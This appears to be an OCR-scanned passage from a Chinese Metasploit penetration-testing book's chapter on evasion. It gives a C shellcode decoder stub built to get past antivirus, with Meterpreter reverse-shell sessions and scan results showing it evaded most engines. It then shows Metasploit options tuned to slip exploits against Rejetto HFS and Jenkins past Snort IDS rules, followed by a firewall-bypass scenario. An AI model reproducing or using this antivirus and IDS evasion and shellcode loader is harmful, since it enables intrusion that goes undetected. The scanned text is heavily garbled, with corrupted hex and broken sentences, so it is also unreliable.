"\xbc\xdd\xb3\x1c\xla\x8a\x1f\xle\x4f\xac\xbð\xec\x6a\xbf\xf7" 
"\x12\x3f\x85\xbf\x25\xa9\xa5\xeb\x5a\x69\x25\x3b\xc\x23\x25" 
"\x53\xb4\x40\x76\xb6\xcb\x8d\xdb\x27\x5e\x62\x89\xcb\xf4\xb" 
"\ X63 \xf6\x2\xc4\x98\x21\xð\xc3\x66\xe3\x2f\x7b\xe\x1b\x3f" 
"\x4b\x9e\x72\xbf\x18\xf6\xbd\x93\x97\x6\x72\x3a\xbc\xe\xf9" 
"\xdf\x7e\xff\xc9\xf6\x12\x61\xce\xf9\xcb\x56\xb5\xb6\x3c\x57" 
"\x75\x9e\x59\x54\x75\x92\xaf\x69\xa3\xab\xd9\xa8\x20\x9c\x26" 








"\x9b\x5\xb5\xad\x93\x49\xca\xa8\xaa 












































m 
































经 过 编码 的 shellcode 


在 目标 上 运行 可 


执行 原始 的 
执行 程序 


shellcode 








"\x14\x3f\x18... 解密 程序 "boo5 xb2... 
原始 的 shellcode 

















XOR^(AA) 




















个 可 以 解码 的 子 
新 转换 为 初始 的 攻击 载荷 。 这 个 解密 子 程序 将 作为 整 
图 示 更 加 明确 地 演示 了 这 个 解密 子 程序 的 工作 原理 。 


可 以 看 到 在 这 个 程序 执行 后 ， 经 过 编码 的 shellcode 又 被 还 原 成 初始 格式 ， 并 且 得 到 了 执行 。 


下 面 编写 一 个 简单 的 C 程序 来 演示 这 个 过 程 。 





#include"stdafx.h" 

#include «Windows.h» 

#include <iostream> 

#include <iomanip> 

#include <conio.h> 

unsigned char encoded[] = 
"\X14\x3f\x18\x3f\x54\x77\x6e\x73\xde\x8e\x5e\xf0\x9b\x63\x1b" 
"\xfc\x29\x68\xae\x9b\xd8\xa5\xa9\xd8\x30\xfa\xca\xa8\xe6\xbe" 
"\x21\x51\x26\xdd\xaf\xb4\x17\x1d\xdb\xc0\x47\xad\x5b\x94\xab" 
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"\x49\xfd\x01\x38\x2b\xd5\x76\xb9\x85\xc\x79\x0e\xb6\x30\xd8" 
"\x8c\xf5\x65\xfe\xbd\x3a\xa8\x3e\xfa\x67\x45\x6e\xa3\x33\xe8" 
"\x53\x94\x7d\xf4\xd8\xa6\x53\x4c\xcd\x6e\x52\x6d\x93\xf5\x9" 
"\x6d\x12\x26\x75\xeb\x9\x7b\x70\xb2\xf2\x8b\x3a\x30\x22\xd2" 
"\xf3\x9a\x5f\x1lf\x2\xe2\x9b\xdb\xf9\x95\xel\x28\x44\x92\x22" 
"\x53\x9e\x66\xal\xf3\x1l4\xdc\x5a\xf2\xb9\x4a\xd9\xfc\x72\xcce" 
"\x71\xd0\x75\x01\xfd\x2c\xfe\xe0\x12\xa5\x84\xc3\xb6\xfe\x5e" 
"\xba\xaf\x9a\xf1\x86\xff\x31\xae\x22\xb7\x9b\xfa\xb\xd5\xf7" 
"NxXIf\NX22\XAd5\X37\X1IDNX31\xa6\Xo\XDANXIa\KIL \X29 NX7A\X3A4NXEG™ 
"\x38\x5a\x8a\x18\xb6\x3a\x74\x99\xf6\x12\x8e\xcd\xa6\x78\x27" 
"\xa2\x6d\x88\x9b\x77\xd7\x83\xf\xb4\x83\x8d\xfa\x5d\x81\x92" 
"\x21\xf1\x8\x74\x51\x99\x4e\xe4\x16\x49\xee\x95\xfe\x44\xel" 
"\xca\xee\xbb\x2c\xa3\x45\x54\xd4\xcb\x32\xcd\x71\x53\x93\xcd" 
"\x5C\x2d\xd0\x49\x58\xd2\x9e\xae\xdd\xc1l\x8b\xd9\xdd\xd9\x18" 
"\xbc\xdd\xb3\xlc\xla\x8a\xlf\xle\x4f\xac\xb0\xec\x6a\xbf\xf7" 
"\x12\x3f\x85\xbf\x25\xa9\xa5\xeb\x5a\x69\x25\x3b\xc\x23\x25" 
"\ x53 \xb4\x40\x76\xb6\xcb\x8d\xdb\x27\x5e\x62\x89\xcb\xf4\xb" 
"\ X63 \xf6\x2\xc4\x98\x21\x00\xc3\x66\xe3\x2f\x7b\xe\x1b\x3f" 
"\x4b\x9e\x72\xbf\x18\xf6\xbd\x93\x97\x6\x72\x3a\xbc\xe\xf9" 
"\xdf\x7e\xff\xc9\xf6\x12\x61\xce\xf9\xcb\x56\xb5\xb6\x3c\x57" 
"AX75NX9eNxX59NxX54Ax75NxX92Nxa£Nx69Nxa3VxabWxd9 Vxa8Nx20Nx9cNx26" 
"\x9b\x5\xb5\xad\x93\x49\xca\xa8\xaa"; 

int main() 

t 

void *exec - VirtualAlloc(0, sizeof encoded, MEM COMMIT, 

PAGE EXECUTE READWRITE); 





for (unsigned int i = 0; i < sizeof encoded; ++i) 

{ 

unsigned char val = (unsigned int)encoded[i] ^ 0xAA; 
encoded[i] = val; 


Ó 

memcpy (exec, encoded, sizeof encoded); 
((void(*)())exec) 0 ; 

return 0; 


) 

这 也 是 一 个 非常 简单 的 程序 。 我 们 使 用 函数 VirtualAlloc () 来 调用 进程 的 虚 地 址 空间 。 接 下 来 
使 用 函数 memcpy O 将 解码 之 后 的 字 节 复 制 到 ViztualAlloc 指针 所 指向 的 空间 中 。 然后 执行 这 个 空 
间 中 的 字 节 。 现 在 可 以 测试 这 个 程序 了 ， 注 意 观 察 它 是 如 何在 目标 环境 中 工作 的 。 可 以 使 用 和 之 前 一 
样 的 方法 来 查看 程序 的 MDS 散 列 值 ， 如 下 图 所 示 。 


root@kali:-~# md5sum /var/www/html/DecoderStub.exe 
8c2db2c830c224b72faaa548d69499b9  /var/www/html/DecoderStub.exe 


我 们 可 以 试 着 下 载 并 执行 这 个 程序 ， 过 程 如 下 图 所 示 。 
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X Download complete 
Downloaded 9.00 KB (9216 Bytes) 


Address 





http://192.168.10.101/DecoderStub.exe 





The file saved as 











C:\Users\Apex\Downloads\Programs\DecoderStub_2.exe 





Open Open with... Openfolder | Close 














Don't show this dialog again ce 
| 














© 260rorat secunirv «x 





decoderstub 2.exe 





A 3D aE) ENG 1220AM = | 
我 们 很 顺利 地 完成 了 下 载 操 作 ! 这 正 是 我 们 想 要 的 。 至 于 弹出 的 “未 知 文件 ”对 话 框 ， 你 完全 不 
必 担 心 ， 这 只 是 表示 这 个 程序 是 一 个 未 知 文件 。 现 在 我 们 试 着 执行 这 个 程序 ， 过 程 如 下 所 示 。 





msf exploit(multi/handler) > 
[*] Sending stage (179779 bytes) to 192.168.10.102 


[*] Meterpreter session 3 opened (192.168.10.101:4444 -» 192.168.10.102:18984) at 2018-04-20 
14:57:28 -0400 





Application Tools BENSIEEES 


File Home Share View Manage 


iB % Cut "i B x La Th New item ~ v 国 open ~ Pf select all 
w] Copy path Edit 




















fa Easy access 7 1; Select no 
Pin to Quick aste ji 
es li Copy Past 向 Pasetbonam rats pis) gs Rename I copam b History gg Invertsel 
Clipboard Organize New Open Select 
€ v 个 > This PC > MI(E) > Source > EncoderDecoder > DecoderStub > Release v 
& Screenshots A Name Date modified Type Size 
o MEGA m] DecoderStub.exe 4/21/2018 12:06 A.. Application 9 KB 
.] DecoderStub.iob . è 8 12:06 A.. IOBJ File 39 KB 
t$ Box Sync — ij Date created: 4/21/2018 12:05 AM : 
|_| DecoderStub.ipdl Size: 9.00 KB 8 12:06 A.. IPDB File 8KB 
部 Dropbox Ë DecoderStub.pdb 


4/21/2018 12:06 A.. Program Debug D... 676 KB 
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不 错 吧 ， 我们 现在 成 功 地 在 一 台 装 有 奇 虎 360 杀毒 软件 的 64 位 Windows 10 操作 系统 上 获得 了 
Meterpreter 的 控制 权限 ， 要 知道 这 个 系统 可 是 受到 了 完善 的 保护 并 安装 了 当前 所 有 的 补丁 和 更 新 。 接 
下 来 不 妨 再 到 http:/nodistribute.com/ 测 试 一 下 这 个 程序 。 























© NoDistribute 


Fil 
DecoderStub.exe 
MD5 © First Scanned 
8c2db2c830c224b72faaa548d69499b9 21:04:17 | 04/20/2018 


O 
Q iH cted By 


Clean 





EBZ 


Ad-Awar 
DeepScan 


AhnLab 
Clean 


Q 
k 
© / 
过 / 
€ 
) de 
[c] C 
© 
© 
© 
5 
o 
(die 
K7 
K : 





TrustPort Antiv 
DeepScan 


)r b 
Clean 
ESET NOD32 

a variant of Win32/Rozena.ED ... 


wister Ant 
Clean 









ecure Internet Security 
e detected 






r VirlT eX 
Mal Clean 

G Data Zillya! Internet Security 
DeepScan Cleàn 





KARUS Secu 
Clean 


lz2«c«iumwNocoGeuaiáegog 


eScan Antivirus 
DeepScan 
2011 T, V. 


angmin Antivirus 2 eTrust-Vet 
Trojan.Generic.bvpnh Malware detected 





timate 


Clean 

















可 以 看 到 , 一些 杀毒 软件 仍然 将 这 个 程序 标记 为 恶意 软件 。 不 过 ， 我 们 的 技术 躲 过 了 这 些 主流 杀 
毒 软件 的 查 杀 ， 包 括 Avast、AVG、Avira、Kaspersky、Comodo， 其 至 是 Norton 和 McAfee。 其 余 的 9 
个 杀毒 软件 也 可 以 通过 延迟 执行 、 文 件 抽取 (file pumping ) 等 技术 绕 过 。 为 了 确认 这 次 查 杀 的 结 
我 们 在 文件 上 单 击 鼠 标 右键 ， 然 后 选择 使 用 奇 虎 360 扫描 。 
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$Moveto* X Delet v 
^n iV] 
1B cap, [Rename New Properties 
folder > 
tgan N 
oderDecoder > DecoderStub > Release vU 
Open 


Name 
Open using Resource Hacker 
*] DecoderStub.exe 


DecoderStub;iobj 
DecoderStub.ipdb 
Ê DecoderStub.pdb. 


My. Run as administrator 
(8 Import to Grammarly 
Edit with HHD Hex Editor Neo 
Q^ Run Sandboxed 
Troubleshoot compatibility 
Run with graphics processor 
Pin to Start. 


g 


Edit with Notepad++ 


> 


Bulk Rename Here 
EB Open with LogMX 
| Share 


È Scan with 360 Total Security 


É Run in 360 Sandbox 


(€ Force delete with 360 Total Security 


$ Add to archive. 
= 














© a60 ToTAt secuRITY 


(® 00:00:02 




















没 问题 ! 在 整个 练习 过 程 中 ， 我 们 学 习 了 攻 了 

















同时 我 们 也 见识 到 了 一 个 小 小 的 自 定义 纺 














用 





码 程序 在 规避 杀毒 软件 查 杀 时 的 神奇 作 


9.2 ”使 用 Metasploit 规避 入 侵 检测 系统 
如 果 目 标 所 在 的 网 络 部 署 了 入 侵 检 测 系 统 , 那么 你 与 目标 之 间 的 会 话 可 能 很 快 就 会 被 切断 。Snort 


























o 





HT Snort IDS, 


BERT Je UMA mE TAUET AR SEES] shellcode 形态 的 。 


是 一 种 十 分 常见 的 IDS， 当 它 在 网 络 上 发 现 异常 时 ， 就 会 快速 地 发 出 警报 。 下 面 来 考虑 一 种 现实 中 的 


常见 情形 : 对 一 个 Rejetto HFS 服务 器 进行 渗透 ， 但 是 目标 网 络 上 局 月 





0 Automatic 


msf exploit(windows/http/rejetto hfs exec) > exploit 


[I*] Started reverse TCP handler on 192.168.116.146:4444 
[*] Using URL: http://0.0.6.0:8080/ITnYdkjz 

[*] Local IP: http://127.0.0.1:8080/ITnYdkjz 

[*] Server started. 

[*] Sending a malicious request to / 

[*] Payload request received: /ITmYdkjz 

[*] Sending stage (179779 bytes) to 192.168.116.147 


2 12:46:58 -0400 
Tried to delete %TEMP%\YjwlwHQY.vbs, unknown result 
I*] Server stopped. 





meterpreter > fj 


[*] Meterpreter session 1 opened (192.168.116.146:4444 -> 192.168.116.147:49358) at 2018-04-2 


4/22-22:16:58.283645 
*] [Classificstion: Web Application Attack 
192.168.116.147:8080 


[Classification: Web Application Attack] 
192.168.116.147:8080 


Classification: Web Application Attack 
192.168.116.146:8080 


Classification: Web Application Attack 
192.168.116.146:8080 

116:58.514634 
attempt [**] [Classification: Web Application Attack] 
.147:49356 -> 192.168.116.146:8080 

4/22-22:16: 
attempt [** 
.147:4935] - 













Classification: Web Application Attack 


[**] [1:1000001:1] SERVER-WEBAPP Rejetto HttpFileServer Logird 


Priority: 1 


:16:58.310556 [**] [1:1000001:1] SERVER-WEBAPP Rejetto HttpFileServer Logir 


[Priority: 1] 


:58.502137 [**] [1:1000001:1] SERVER-WEBAPP Rejetto HttpFileServer Logir| 


Priority: 1 


:16:58.510643 [**] [1:1000001:1] SERVER-WEBAPP Rejetto HttpFileServer Logir| 


Priority: 1 


[**] [1:1000001:1] SERVER-WEBAPP Rejetto HttpFileServer Logir| 
[Priority: 1] {TCP} 192.168.11 








58.516745 [**] [1:1000001:1] SERVER-WEBAPP Rejetto HttpFileServer Logir| 


Priority: 1 


{TCP} 192.168.11 


{TCP} 192.168.11 


{TCP} 192.168.11 


{TCP} 192.168.11 


{TCP} 192.168.11 




















在 上 面 的 左 图 





话 出 了 问题 。 我 必须 承认 ，Snort 团队 和 交流 社区 所 制定 
为 了 更 好 地 学 习 Metasploit 中 的 规避 技术 ， 我 们 先 来 了 / 


1 可 以 看 到 ， 我 们 已 经 成 功 获得 了 Meterpreter 会 话 。 然 而 ， 上 面 
的 规则 非常 严格 ， 它 们 往往 很 难 
解 一 下 Snort 技术 。 首 先 使 用 Snort 创建 一 个 简 














单 的 规则 ， 它 可 以 检测 到 HFS 服务 器 的 登录 行为 ， 规 则 内 容 如 下 。 


alert tcp $EXTERNAL_NET any -> $HOME_NET $H 
Rejetto HttpFileServer Login attempt"; 
classtype:web-application-attack; 


这 个 规则 十 分 简单 ， 当 任何 来 自 外 部 网 络 的 GET 请 求 〈 无 论 使 用 
"SERVER-WEBAPP RejettoHttpFileServer Login attempt”。 你 能 











络 中 的 HITP 端口 时 ， 都 会 显示 消息 




















TTP PORTS 
content: "GET"; 
$id:1000001;) 


http. method; 

















想 出 一 个 规避 这 种 标准 规则 的 方法 吗 ? 我 们 将 在 下 一 节 给 出 答案 。 


的 右 图 显示 这 个 会 














(msg:"SERVER-WEBAPP 


规避 。 





因此 ， 





什么 端口 ) 试图 连接 到 目标 网 
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9.2.1 通过 一 个 随机 案例 边 玩 边 学 
既然 现在 研究 的 对 象 是 HTTP 请 求 ， 那 么 我 们 可 以 使 用 Burp repeater 这 个 工具 来 进行 快速 测试 。 












































MN MM X. ^—. X MR 
这 里 我 们 需要 同时 使 用 Snort 和 Burp 这 两 种 工具 来 进行 一 些 测试 。 
Request Response 
Raw | Params | Headers | Hex Raw | Headers | Hex | HTML | Render 
GET / HTTP/1.1 IE = C\Windows\system32\cmd.exe - snort -i 7 -c C\Snort\etc\snort.conf -A console 
Host: 192.168.116.147:8080 - 
User-Agent: Mozilla/5.0 (Windows NT 10.0; 04/22-23:23:05.845820 [**] [1:1000001:0] SERVER-WEBAPP Rejetto Htt ^ 
mions ott- A ee pFileServer Login attempt [**] [Classification: Web Application Att 
pant ack] [Priority: 1] {TCP} 192.168.116.1:32863 -> 192.168.116.147:868 
text/html,application/xhtmltxml,application/xm 6 


1;q*0.9,*/*;q-0.8 

Accept-Language: en-US,en;q-0.5 
Accept-Encoding: gzip, deflate 
Cookie: HFS_SID=0. 0958858069498092 
Connection: close 
Upgrade-Insecure-Requests: 1 


可 以 看 到 ， 当 我 们 向 目标 URI 发 送 一 个 请 求 的 时 候 ， 这 个 过 程 就 被 Snort 记录 下 来 了 ， 这 对 于 人 入侵 
者 来 说 可 不 是 一 个 好 消息 。 不 过 ， 我 们 已 经 看 过 了 这 条 规则 的 内 容 ， 并 且 知 道 Snort 的 工作 方式 是 尝试 
对 请 求 中 ce 的 内 容 进行 检查 。 现 在 我 们 尝试 对 GET 请 求 进行 修改 ， 并 再 次 发 送 这 个 请 求 ， 如 下 所 示 。 































































Request Response 
Raw | Params | Headers | Hex 
GeT / HTTP/1.1 à [E] C\Windows\system32\cmd.exe - snort -i 7 -c C\Snort\etc\snort.conf -A console 
Host: 192.168.116.147:8080 - 
User-Agent: Mozilla/5.0 (Windows NT 10.0; 04/22-23:23:05.845820 [**] [1:1000001:0] SERVER-WEBAPP Rejetto Htt ^ 






Win64; x6 
Firefox/59.0 

Accept: 
text/html,application/xhtmléxml,application/xm 
1;q-0.9,*/*;q-0.8 

Accept-Language: en-US,en;q-0.5 
Accept-Encoding: gzip, deflate 

Cookie: HFS_SID=0. 0958858069498092 

Connection: close 

Upgrade-Insecure-Requests: 1 


结果 没有 产生 任何 的 记录 ! 看 来 我 们 找 对 思路 了 。 我 们 刚刚 看 到 了 这 个 案例 中 的 修改 方法 ， 并 成 
功 规避 了 Snort 中 一 个 简单 的 规则 。 但 是 我 们 仍然 不 知道 如 何 使 用 Metasploit 来 实现 这 一 技术 。 下 面 就 
来 看 看 Metasploit 中 提供 的 规避 方法 ， 如 下 所 示 。 


rv:59.0) Gecko/20100101 


pFileServer Login attempt [**] [Classification: Web Application Att 
ack] [Priority: 1] (TCP) 192.168.116.1:32803 -» 192.168.116.147:808 












































msf exploit(windows/http/rejetto hfs exec) > show evasion 
Module evasion options: 

Neme Current Setting Required Description 

HTTP: : chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked" 

HTTP: :compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate) 

HTTP::header folding false no Enable folding of HTTP headers 

HTTP: : junk, headers false no Enable insertion of random junk HTTP headers 

HTTP: :method random case true no Use random casing for the HTTP method 

HTTP::method random invalid false no Use a random invalid, HTTP method for request 

HTTP: :method random valid false no Use a random, but valid, HTTP method for request 

HTTP::no cache false no Disallow the browser to cache HTTP content 

HTTP: :pad_fake_headers false no Insert random, fake headers into the HTTP request 

HTTP::pad fake headers count 6 no How many fake headers to insert into the HTTP request 

HTTP: :pad get parans false no Insert random, fake query string variables into the request 

HTTP::pad get params count 16 no How many fake query string variables to insert into the request 

HTTP::pad method uri count 1 no How many whitespace characters to use between the method and uri 

HTTP: :pad, method uri type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache 

HTTP::pad post params felse no Insert random, fake post variables into the request 

HTTP::pad post params count 16 no How many fake post variables to insert into the request 

HTTP::pad uri version count 1 no How many whitespace characters to use between the uri and version 

HTTP::pad uri version type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache) 

HTTP::server name Apache yes Configures the Server header of all outgoing replies 

HTTP::uri dir fake relative false no Insert fake relative directories into the uri 

HTTP::uri dir self reference false no Insert self-referential directories into the uri 

HTTP: :uri encode mode hex-all no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random 

HTTP: :uri fake end felse no Add a fake end of URI (eg: /520HTTP/1.0/../../) 

HTTP::uri fake params start false no Add a fake start of params to the URI (eg: /*3fa-b/../ 

HTTP: :uri full url false no Use the full URL for all HTTP requests 

HTTP::uri use backslashes false no Use back slashes instead of forward slashes in the uri 

HTTP::version random invalid false no Use a random invalid, HTTP version for request 

HTTP::version random valid ^ false no Use a random, but valid, HTTP version for request 

x send size e no Maximum tcp segment size. (0 - disable) 
TCP: :send delay e no Delays inserted before every send. (0 = disable 
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这 里 面 提 供 了 大 量 可 以 使 用 的 规避 方法 。 我 想 你 心中 已 经 有 答案 了 。 不 过 如 果 你 没 想到 也 没关系 ， 
这 里 我 们 要 使 用 的 是 HTTP: :method_random_case 选项 。 下面 给 出 了 这 个 模块 的 使 用 方法 。 























msf exploit(windows/http/rejetto hfs exec) > set HTTP::method random case true 
HTTP::method random case -» true 


下 面 要 对 目标 发 起 攻击 了 。 


























root@kali: ~ D 32 Xcmd.exe - snort -i 7 -c C\Snort\etc\snort.conf -A console 





File Edit View Search Terminal Help 

msf exploit(windows/http/rejetto hfs exec) > set HTTP::method random case true 
HTTP::method random case => true 

msf exploit(windows/http/rejetto hfs exec) » exploit 


[*] Started reverse TCP handler on 192.168.116.146:4444 
[*] Using URL: http://0.0.0.0:8080/zjkikdqcY 
[*] Local IP: http://127.0.0.1:8080/zjkikdqcY 
[*] Server started. 
[*] Sending a malicious request to / 
[*] Payload request received: /zjkikdqcY 
[*] Sending stage (179779 bytes) to 192.168.116.147 
[*] Meterpreter session 17 opened (192.168.116.146:4444 -» 192.168.116.147:49440) at 2018-04 
-22 14:07:30 -0400 
[*] Server stopped. 
This exploit may require manual cleanup of '*TEMP*XfPtJbOceQMT.vbs' on the target 


meterpreter > 
Tried to delete *TEMP*AfPtJbOceQMT.vbs, unknown result 


meterpreter > 


障碍 已 经 被 清除 了 ， 我 们 轻而易举 地 规避 了 Snort 的 检测 规则 。 在 下 一 节 中 ， 我 们 将 面 对 更 加 复 
杂 的 情况 。 








9.2.2 ”利用 伪造 的 目录 关系 来 欺骗 IDS 


和 前 面 的 方法 类 似 ， 我 们 可 以 使 用 Metasploit 中 的 伪造 目录 关系 功能 来 自 改 目录 ,最终 达到 相同 
的 效果 。 让 我 们 看 看 下 面 的 规则 。 


alert tcp $EXTERNAL NET any -> $HOME NET $HITP PORTS (msg:"APP-DETECT Jenkins Groovy script access through script console attempt"; 
flow:to server,established; content:"POST /script"; fast pattern:only; metadata:service http; 
reference:url,github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins script console.rb; 
reference:url,wiki.jenkins-ci.org/display/JENKINS/JenkinstScript4Console; classtype:policy-violation; 3id:37354; rev:1;) 


可 以 看 到 ， 前 面 的 Snort 规则 仅 对 content 部 分 内 容 为 POST /script 的 入 站 数据 包 进 行 检查 。 
解决 这 个 问题 有 很 多 种 方法 ， 这 里 介绍 一 个 全 新 的 方法 : 伪造 目录 关系 。 这 种 技术 会 在 要 访问 的 目录 
地 址 前 面 添加 随机 的 内 容 。 例 如 ， 如 果 要 访问 的 文件 位 于 /Nipun/abc.txt 处 ， 则 这 个 模块 会 使 用 类 似 于 
/root/whatever/../../Nipun/abc.txt 的 地 址 , 这 意味 着 它 虽然 使 用 了 其 他 的 地 址 , 但 是 最 终 返 回 到 了 同一 个 
目录 。 因 此 ， 这 使 得 URL 变 得 足够 长 ， 足 以 使 IDS 失去 作用 。 我 们 来 考虑 一 个 例子 。 


在 这 个 练习 中 , 我 们 将 使 用 jenkins_script_console 漏洞 模块 来 完成 对 运行 在 192.168.1.149 
上 的 目标 进行 渗透 攻击 ， 这 个 过 程 如 下 图 所 示 。 


Imsf > use exploit/multi/http/jenkins script console 











































































































Imsf exploit( ) > set RHOST 192.168.1.149 
RHOST => 192.168.1.149 

Imsf exploit( ) > set RPORT 8888 

RPORT => 8888 

Imsf exploit( ) > set TARGETURI / 


TARCETURI => / 











可 以 看 到 ,Jenkins 运行 在 全 地 址 为 192.168.1.149 的 主机 的 8888 端口 上 。 接 下 来 就 可 以 使 用 exploit/ 





9.3 规避 Windows 防火 墙 的 端口 阻塞 机 制 249 





multi/http/Jenkins_script_console 模块 来 渗透 目标 了 。 上 图 中 已 经 完成 了 对 RHOST, RPORT 
和 TARGEURI 几 个 参数 的 设置 ， 现 在 可 以 开始 对 系统 进行 渗透 攻击 了 。 


[*] Meterpreter session 3 opened (192.168.1.14:4444 -> 192.168.1.149:54402) 
at 2018-04-24 04:40:01 -0400 














meterpreter > 


搞定 了 ! 我 们 已 经 轻松 获得 了 控制 日 标的 Meterpreter 权限 。 下 面 看 看 Snort 是 怎么 记录 我 们 这 次 
的 攻击 过 程 的 。 














724-00:04:40.460374 Txx*] [1:37354:1] APP-DETECT Jenkins Groovy script access through script console attempt [xx] ER] 
ion] [Prioritu: 11 XTCP? 192.168.1.14:38839 -> 192.168.1.149:8888 


不 妙 ， 看 起 来 好 像 被 Snort 发 现 了 ! 我 们 要 在 Metasploit 中 按 如 下 所 示 设 置 规避 选项 。 











Imsf exploit(multi tp/jen t )» set HTTP:: 

set HTTP: : CHUNKED set HTTP::PAD POST PARAMS 

set HTTP: : COMPRESSION set HTTP: :PAD | POST | PARAMS COUNT 
set HTTP::HEADER FOLDING set HTTP::PAD URI VERSION COUNT 
set HTTP::JUNK HEADERS set HTTP::PAD URI VERSION TYPE 
set HTTP: : METHOD | RANDOM CASE set HTTP: :SERVER - NAME 

set HTTP : : METHOD | RANDOM ^ INVALID set HTTP::URI DIR FAKE RELATIVE 
set HTTP::METHOD RANDOM VALID set HTTP::URI DIR SELF REFERENCE 
set HTTP::NO CACHE set HTTP::URI ENCODE MODE 

set HTTP: :PAD | FAKE HEADERS set HTTP::URI FAKE END 

set HTTP: :PAD | FAKE | HEADERS COUNT set HTTP::URI FAKE PARAMS START 
set HTTP::PAD GET PARAMS set HTTP::URI FULL URL 

set HTTP::PAD GET PARAMS COUNT set HTTP::URI USE BACKSLASHES 
set HTTP: :PAD | METHOD | URI COUNT set HTTP::VERSION RANDOM INVALID 
set HTTP: :PAD | METHOD | URI | TYPE set HTTP: :VERSION | RANDOM VALID 
msf exploit( >) > set HTTP::URI DIR FAKE RELATIVE t 
rue 

HTTP::URI DIR FAKE RELATIVE => true 

msf exploit( lti t )» 











现在 重新 运行 这 个 模块 ， 看 看 是 否 仍 然 会 被 Snort 发 现 。 











Æ Administrator: Windows PowerShell 





Commencing packet processing (pid-44225 

















o 





什么 都 没 被 记录 下 来 ! R RER ARRAROA REA E 


[*] Sending stage (957487 bytes) to 192.168.1.149 
[*] Command Stager progress - 100.00* done (99626/99626 bytes) 
[*] Meterpreter session 5 opened (192.168.1.14:4444 -» 192.168.1.149:51756) at 2018-04-24 04:44:29 -0400 








meterpreter > Bj 


干 得 漂亮 ! 我 们 又 一 次 躲 过 了 Snort 的 检查 ! 你 可 以 尝试 使 用 各 种 Snort 规则 , 以便 更 好 地 了 解 它 
的 工作 机 制 。 


9.3 规避 Windows 防火 墙 的 端口 阻塞 机 制 


当 我 们 试图 在 目标 Windows 操作 系统 中 执行 Meterpreter 时 , 经 常会 发 现 无 法 成 功 建立 控制 会 话 。 这 
种 情形 多 半 是 由 于 目标 系统 的 管理 员 使 用 防火 墙 对 特定 端口 进行 了 阻塞 造成 的 。 在 下 面 这 个 例子 中 , 我 
们 试 着 使 用 Metasploit 中 一 个 非常 灵巧 的 攻击 载荷 来 规避 防御 机 制 。 首 先 快速 建立 一 个 如 下 的 场景 。 





















































250 ”第 9 章 Metasploit 中 的 规避 技术 








r 
[4 New Outbound Rule Wizard 





Protocol and Ports 


Specify the protocols and ports to which this rule applies. 


Steps: 

a Rule Type Does this rule apply to TCP or UDP? 
* Protocol and Ports Q9, TCP 

* Action D UDP 

* Profile 

* Name 


Does this rule apply to all remote ports or specific remote ports? 
D All remote ports 
9) Specific remote ports: 4444-6666 
Example: 80, 443, 5000-5010 





Learn more about protocol and ports 











«Back — J[ Nex» | | 


Cancel 























我 们 建立 了 一 条 新 的 防火 墙 规则 ， 并 指定 将 其 应 用 在 远程 主机 的 4444-6666 端口 上 。 接 下 来 进行 








设置 ， 以 阻止 试图 使 用 这 些 端口 的 出 站 流量 ， 如 下 图 所 示 。 








LÀ New Outbound Rule Wizard 


=s) 





Action 


Specify the action to be taken when a connection matches the conditions specified in the rule. 


Steps: 


Rule T What action should be taken when a connection matches the specified conditions? 
è Rule Type 


è Protocol and Ports 全 
(D Allow the connection 


We This includes connections that are protected with IPsec as well as those are not. 
© Profile 

© Allow the connection if it is secure 
è Name 


This includes only connections that have been authenticated by using IPsec. Connections will 
be secured using the settings in IPsec properties and rules in the Connection Security Rule 
node. 


(9) Block the connection 


Learn more about actions 











«Back |[ Nex> | | 


Cancel 
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检查 一 下 防火 墙 状态 和 我 们 刚刚 制定 的 规则 。 























rJ Windows Firewall with Advanced Security 


gO [ul > Control Panel » All Control Panel Items » Windows Firewall File Action View Help 
ees|ztysiH 























adi Help protect your computer with Windows fi sees sodio Pub exl 
Name Group ^ || Outbound Rules. ^ 
Allow s program orem Windows Firewall can help prevent hackers or malicious sd n Outbound Rules) — | SBlock4444-6666 "m New Rule 
1 ou WIndows Fife through the Intemet or a network. Connection Seamity R @ Core Networking - DNS (UDP-O.. Core Netwoi _ 一 一 
"y Change notification settings How does a firewall help protect my computer? > & Monitoring Ü Core Networking - Dynamic Hos.. Core Netwoi =|| Y Filter by Profile > 
加 Turn Windows Firewall on or What are network locations? @ Core Networking - Dynamic Hos.. Core Netwol || Y Filter by State — » 
e" @ Core Networking - Group Policy.. Core Networ || Y^ Filter by Group » 
È Restore defaults m ® Home or work (private) networks ( Core Networking - Group Policy... Core Networ Vw z 
É) Advanced settings 可 : @ Core Networking - Group Policy.. Core Networ || _ PVT 
Troubleshoot my network m - Public networks @ Core Networking - Internet Grou.. Core Networ E | 
@ Core Networking - IPHTTPS (TCP... Core Networ i» Export List... 
Networks in public places such as airports or coffee shop @ Core Networking - IPv6 (IPv6-Out) Core Netwo! Help 
: @ Core Networking - Multicast List.. Core Networ 
MAndows Firewall site 9 @ Core Networking - Multicast List.. Core Networ Block 4444-6666 2 





























可 以 看 到 这 条 规则 已 经 建立 好 了 ， 而 且 家 庭 网 络 和 公共 网 络 上 都 启用 了 防火 墙 。 我 们 在 目标 上 运 
行 了 Disk Pulse Enterprise 软件 。 在 前 面 的 章节 中 ,我 们 已 经 完成 了 对 这 个 软件 的 渗透 。 下 面试 着 执行 
这 个 渗透 模块 。 


Module options (exploit/windows/http/disk pulse enterprise bof): 

















Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RHOST 192.168.174.131 yes The target address 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connections 

VHOST no HTTP server virtual host 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 192.168.174.134 yes The listen address 

LPORT 4444 yes The listen port 


Exploit target: 
Id Name 


0 Disk Pulse Enterprise 9.0.34 


sf exploit(windows/http/disk pulse enterprise bof) » exploit 





[*] Started reverse TCP handler on 192.168.174.134:4444 

[*] Generating exploit... 

[*] Total exploit size: 21383 

[*] Triggering the exploit now... 

[*] Please be patient, the egghunter may take a while... 

[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer 
[*] Exploit completed, but no session was created. 

msf exploit(windows/http/disk pulse enterprise bof) > 


